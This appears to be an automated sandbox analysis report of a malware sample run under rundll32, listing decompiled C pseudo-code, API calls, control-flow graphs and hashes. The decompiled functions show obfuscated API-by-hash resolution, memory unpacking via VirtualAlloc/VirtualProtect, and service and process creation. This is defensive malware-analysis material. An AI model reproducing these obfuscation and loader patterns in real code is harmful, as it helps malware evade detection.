                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: 0621E2B290020CBFEF019F95DD498DEBBB9EB55358F108198FA2462250D7B69E249B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 501 2051638-2051641 502 2051643 501->502 503 205164b-20516d1 DdeInitializeA call 2051328 call 2051a14 501->503 502->503 513 20516d6-20516eb 503->513
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 02051686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction ID: 102dd1c3f1f4a56211691c16e4c62dda2d5b53e1e265d8b3ef48693c814b44d7
                                                                      • Opcode Fuzzy Hash: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction Fuzzy Hash: 7A119E70600B11AFE721EB75CD81B4FB7E5EF55700F901828E905DBB60EABAB901AB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 515 1deb40-1deb93 VirtualProtect 516 1deb95-1deba1 515->516 517 1deba6-1dec17 515->517 518 1dec3a-1dec85 call 1de7a0 call 1de7e0 516->518 517->518 533 1dec19-1dec37 517->533 525 1dec90-1dec9a 518->525 527 1dec9c-1deca3 525->527 528 1decf8-1ded4a call 1de920 525->528 531 1deced-1decf6 527->531 532 1deca5-1decac 527->532 537 1ded4c-1ded50 528->537 538 1ded78-1ded7f 528->538 531->525 532->531 536 1decae-1decea call 1de7e0 532->536 533->518 536->531 537->538 542 1ded52-1ded75 call 1de880 537->542 543 1ded8a-1ded94 538->543 542->538 545 1dede6-1dee1b call 1df000 543->545 546 1ded96-1ded9d 543->546 549 1ded9f-1deda6 546->549 550 1deddb-1dede4 546->550 549->550 553 1deda8-1dedd9 call 1dee20 VirtualProtect 549->553 550->543 553->550
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001DEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001DEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: b148d44ab56b61b2bca518033b4ef3e6d81f2716129a530a4a85c7b1bde80d7b
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 9EC1A875A002099FCB48DF88C590EAEB7B6BF88305F248159E9099F355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 556 2051a14-2051a5a call 2051ac8 562 2051a70-2051aa7 DdeCreateStringHandleA DdeNameService 556->562 563 2051a5c-2051a69 556->563 566 2051aaf 562->566 563->562
                                                                      APIs
                                                                        • Part of subcall function 02051AC8: DdeFreeStringHandle.USER32(?,?), ref: 02051AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 02051A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 02051A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction ID: b151ea0f558b62dc6bad685f41c6d064b33f40c121761eab6ec87d08343984d6
                                                                      • Opcode Fuzzy Hash: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction Fuzzy Hash: 34118E31710325ABDB12EFA4CC80A5F77EDEF09B00B4005A4FE04EB255D6B1ED0097A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E01FF7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E01FF7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}














                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 01FF7FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: 95dc4129b8c9b7350b193ba354ecb56fd3d1da8b3ad54597fa8731147189f0d9
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: 5B11DFB6C01219BBEF01EFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: bc6b326a41a5d26bea6e29ba8bc052ecf4b9a8ac294c75c02919a97063cff55d
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 36113060D08289EAEF01D7E884097FEBFB55B21705F044098E5446B282D3BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E0200B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E01FF7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}












                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0200B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: f2a587d58244c9be459cf44d469b377bdf4ad0f5d92e2352495b40eda2cd12b4
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 0721C472800248BBEF159F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E01FF471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E02002550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E01FF7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}













                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 01FF47E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 1a88c1d8ed51b6097d23ccce26c076287bbe3dadd5d3f1899b9891b62f7bab5b
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: A721F272D01218BBEF05DFE4C84A8DEBBB5EF05354F108089E924A6290D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0200340E(void* __ecx, void* __edx, int _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				short* _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t45;
                                                                      				void* _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				E02002550(_t45);
                                                                      				_v28 = 0x755cc3;
                                                                      				_v24 = 0;
                                                                      				_v20 = 0xc93f;
                                                                      				_v20 = _v20 >> 3;
                                                                      				_t59 = 0x1a;
                                                                      				_v20 = _v20 / _t59;
                                                                      				_v20 = _v20 ^ 0x00003660;
                                                                      				_v16 = 0x16ad;
                                                                      				_v16 = _v16 + 0x57a7;
                                                                      				_v16 = _v16 | 0xbe0b763b;
                                                                      				_v16 = _v16 ^ 0xbe0b2e9f;
                                                                      				_v12 = 0xa207;
                                                                      				_v12 = _v12 + 0xb6;
                                                                      				_t60 = 0x37;
                                                                      				_v12 = _v12 * 0x38;
                                                                      				_v12 = _v12 ^ 0x0023dbd3;
                                                                      				_v8 = 0xebb1;
                                                                      				_v8 = _v8 / _t60;
                                                                      				_v8 = _v8 | 0x19ad118e;
                                                                      				_v8 = _v8 ^ 0x19ad0924;
                                                                      				E01FF7378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
                                                                      				_t57 = OpenSCManagerW(0, 0, _a12); // executed
                                                                      				return _t57;
                                                                      			}














                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 020034D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: c449c0e66c87d08424e8c80836b5017f9d1a244730bdf41b66408f2ba1d5ab92
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: E62104B1D01319ABEB04DFA9C84A8DFBBB5FB10314F10818AE414AA280D3B55B148B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E02000321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t44;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      				int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t60 = __edx;
                                                                      				_t59 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t44);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0xc39a9;
                                                                      				_v20 = 0xd5ea;
                                                                      				_v20 = _v20 | 0xff6e49b2;
                                                                      				_v20 = _v20 << 1;
                                                                      				_v20 = _v20 ^ 0xfeddf181;
                                                                      				_v12 = 0x5ebb;
                                                                      				_v12 = _v12 * 0x36;
                                                                      				_v12 = _v12 * 0x4e;
                                                                      				_v12 = _v12 | 0x0415626f;
                                                                      				_v12 = _v12 ^ 0x0617d8e0;
                                                                      				_v16 = 0xb467;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 * 0x58;
                                                                      				_v16 = _v16 ^ 0x03e03a17;
                                                                      				_v8 = 0xc80e;
                                                                      				_v8 = _v8 * 5;
                                                                      				_v8 = _v8 * 0x5d;
                                                                      				_v8 = _v8 >> 5;
                                                                      				_v8 = _v8 ^ 0x000b2851;
                                                                      				E01FF7378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
                                                                      				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
                                                                      				return _t56;
                                                                      			}














                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 020003E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: 0c5e7d6929d7acab19da5c2012ebab23d200f6429f8ef3e518442dd321af55d4
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: F621DFB1C01219BBDB14DFA5C98A8DEBFB4EB45304F108199E825B6260D3B49B54DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E020049CF(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t52;
                                                                      				struct HINSTANCE__* _t65;
                                                                      				signed int _t67;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      
                                                                      				_push(_a4);
                                                                      				E02002550(_t52);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x2e62bd;
                                                                      				_v12 = 0x9175;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_t67 = 0x72;
                                                                      				_v12 = _v12 / _t67;
                                                                      				_v12 = _v12 ^ 0x00007d95;
                                                                      				_v20 = 0x6b8f;
                                                                      				_v20 = _v20 + 0xab5d;
                                                                      				_v20 = _v20 ^ 0x000118a2;
                                                                      				_v16 = 0x74fd;
                                                                      				_v16 = _v16 + 0xb2f4;
                                                                      				_v16 = _v16 | 0x45835894;
                                                                      				_v16 = _v16 ^ 0x45831718;
                                                                      				_v8 = 0x475a;
                                                                      				_t68 = 0x1a;
                                                                      				_v8 = _v8 / _t68;
                                                                      				_t69 = 0x71;
                                                                      				_v8 = _v8 / _t69;
                                                                      				_v8 = _v8 | 0x9a1a6af5;
                                                                      				_v8 = _v8 ^ 0x9a1a601d;
                                                                      				E01FF7378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
                                                                      				_t65 = LoadLibraryW(_a4); // executed
                                                                      				return _t65;
                                                                      			}















                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 02004A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: a0a9525f366297be9205ec55cd22178dac784b83630e065956c3217af9c09b35
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: F62118B5E00208FBEB04CFA5C95A5EEBBB1EB50304F10C099E518A7290D7B56B549B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E020041CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				intOrPtr* _t50;
                                                                      				void* _t51;
                                                                      				signed int _t53;
                                                                      				void* _t57;
                                                                      
                                                                      				_t57 = __ecx;
                                                                      				E02002550(_t42);
                                                                      				_v20 = 0x33dd;
                                                                      				_t53 = 0x60;
                                                                      				_v20 = _v20 / _t53;
                                                                      				_v20 = _v20 ^ 0x0000445b;
                                                                      				_v8 = 0x98b2;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 | 0x9f0dae98;
                                                                      				_v8 = _v8 + 0xffff2dd8;
                                                                      				_v8 = _v8 ^ 0x9f6f2800;
                                                                      				_v16 = 0x7a4d;
                                                                      				_v16 = _v16 << 5;
                                                                      				_v16 = _v16 ^ 0x630ec107;
                                                                      				_v16 = _v16 ^ 0x6301fd0c;
                                                                      				_v12 = 0xd3a1;
                                                                      				_v12 = _v12 ^ 0x9b5a4994;
                                                                      				_v12 = _v12 + 0xffffbec0;
                                                                      				_v12 = _v12 ^ 0x9b5a0da8;
                                                                      				_t50 = E01FF7378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
                                                                      				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
                                                                      				return _t51;
                                                                      			}













                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0200428A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: 7edeb9d79b06b18bdf915a4914c6a59fc09bfabe6e9d4367b1f69e9e0fc0edb3
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: A5115C72E00319BFEB04DFE4CC4AAEEBBB5EF44710F108188E924662A0D7B55B109F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E01FF5AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t47;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E02002550(_t47);
                                                                      				_v20 = 0xc8c;
                                                                      				_v20 = _v20 + 0xffffaa04;
                                                                      				_v20 = _v20 ^ 0xb702763d;
                                                                      				_v20 = _v20 ^ 0x48fdd1a6;
                                                                      				_v16 = 0xeb1c;
                                                                      				_v16 = _v16 << 4;
                                                                      				_t59 = 0xf;
                                                                      				_v16 = _v16 * 0xe;
                                                                      				_v16 = _v16 + 0xffff64c4;
                                                                      				_v16 = _v16 ^ 0x00cd6bec;
                                                                      				_v12 = 0x757;
                                                                      				_v12 = _v12 ^ 0x4183b2e4;
                                                                      				_v12 = _v12 << 2;
                                                                      				_v12 = _v12 / _t59;
                                                                      				_v12 = _v12 ^ 0x0067440e;
                                                                      				_v8 = 0xa082;
                                                                      				_v8 = _v8 >> 1;
                                                                      				_v8 = _v8 >> 8;
                                                                      				_v8 = _v8 ^ 0xcec43627;
                                                                      				_v8 = _v8 ^ 0xcec45939;
                                                                      				E01FF7378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
                                                                      				_t57 = CloseServiceHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}











                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 01FF5B77
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: 902f9cdb0904f8c03d54b135100134bc4aea96dd76305c0a38a79d325756e018
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
